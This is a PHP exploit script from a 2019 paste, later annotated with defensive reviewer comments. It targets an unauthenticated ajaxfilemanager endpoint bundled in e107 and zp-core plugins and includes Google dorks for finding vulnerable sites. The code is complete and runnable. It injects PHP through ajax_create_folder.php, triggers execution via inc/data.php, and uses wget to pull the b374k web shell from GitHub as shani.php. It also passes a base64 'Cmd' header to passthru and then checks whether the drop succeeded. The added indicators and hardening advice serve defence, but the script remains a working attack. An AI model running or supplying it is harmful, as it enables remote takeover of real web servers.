Panther_INDO


Jun 20th, 2019
<?php

/*
dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
use ur brain :p
*/

/*
 * Reviewer notes (defensive reading of this paste).
 *
 * What the script does, as far as the visible code shows:
 *   1. POSTs a form body whose single field "foo" contains PHP source to
 *      <path>/ajax_create_folder.php on the target, over plain HTTP on port 80.
 *   2. Requests <path>/inc/data.php on the same host.
 *   3. Fetches <path>inc/shani.php and looks for a fixed banner string to
 *      decide whether a file was dropped.
 * NOTE(review): step 2 only makes sense if the file manager persists request
 * data into inc/data.php, where it is then executed as PHP. That is inferred
 * from the request order, not shown here; confirm against the plugin source.
 *
 * The two paths in the author's header comment name the products that bundle
 * the component (an e107 media-gallery plugin and a tiny_mce plugin under
 * zp-core); use them to inventory your own installs.
 *
 * Artifacts a defender can search for (all taken from this listing):
 *   - access-log pairs from one client: POST .../ajax_create_folder.php
 *     followed by GET .../inc/data.php;
 *   - a request body starting with "foo=<?php";
 *   - a file named shani.php inside the file manager's inc/ directory;
 *   - the web-server account spawning wget, and outbound HTTPS from the web
 *     host to raw.githubusercontent.com;
 *   - later requests carrying a "Cmd" header (PHP exposes it as HTTP_CMD)
 *     with a base64 value;
 *   - the text "File upload by unnamed48" in files under the web root.
 *
 * Hardening that removes the precondition: delete or update the bundled
 * ajaxfilemanager, require authentication for its endpoints, refuse direct
 * web access to its inc/ directory, disable PHP execution in directories the
 * web server can write to, and restrict outbound connections from web hosts.
 */

// Silence all PHP diagnostics, lift the execution time limit, and cap socket
// waits at 5 seconds.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

/**
 * Send a pre-built raw HTTP request to $host on TCP port 80 and return
 * everything read from the socket afterwards.
 *
 * Terminates the whole script via die() when the connection cannot be opened.
 * The socket is never closed explicitly in this function. Only cleartext HTTP
 * is spoken, so the requests are visible to network sensors.
 *
 * @param string $host   Host name or address to connect to.
 * @param string $packet Complete request text (request line, headers, body).
 * @return string|false  Result of stream_get_contents() on the socket.
 */
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");

fwrite($sock, $packet);
return stream_get_contents($sock);
}

// Both the host and the file-manager path are mandatory CLI arguments.
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
die();
}

$host = $argv[1];
$path1 = $argv[2];

// Request body: one form field, "foo", whose value is PHP source. The embedded
// source runs wget to save a remote file as shani.php and then passes a
// base64-decoded value to passthru().
// NOTE(review): this is a double-quoted string, so the local PHP interpreter
// expands variables in it before anything is sent. Detection signatures should
// key on the stable parts (the "foo=<?php" prefix, the wget URL, the endpoint
// name) rather than on the full literal text.
$exploit = "foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
// First request: unauthenticated POST to the folder-creation endpoint. No
// cookie or token header is sent, so an endpoint that accepts this is exposed
// to anonymous clients.
$packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";

// The response is discarded; only the side effect on the server matters here.
http_send($host, $packet);

// Second request: GET of inc/data.php under the same path. Response is again
// discarded.
$packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);
// Verification step: build http://<host><path>inc/shani.php (no separator is
// inserted, so the path argument is expected to end in "/") and fetch it.
$in = "inc/shani.php";
$ha = "http://";
$target = $ha.$host.$path1.$in;
$cek = file_get_contents($target);

print "\n[+] Thanks to Unamed48\n";
// Success is judged solely by a banner string in the fetched page; presumably
// the downloaded file prints it. The same string is a usable grep target when
// sweeping a web root.
if(preg_match("/File upload by unnamed48/", $cek))
{
echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n";
}
else {
echo "\n\n[-] Exploit Failed :(\n";
}
?>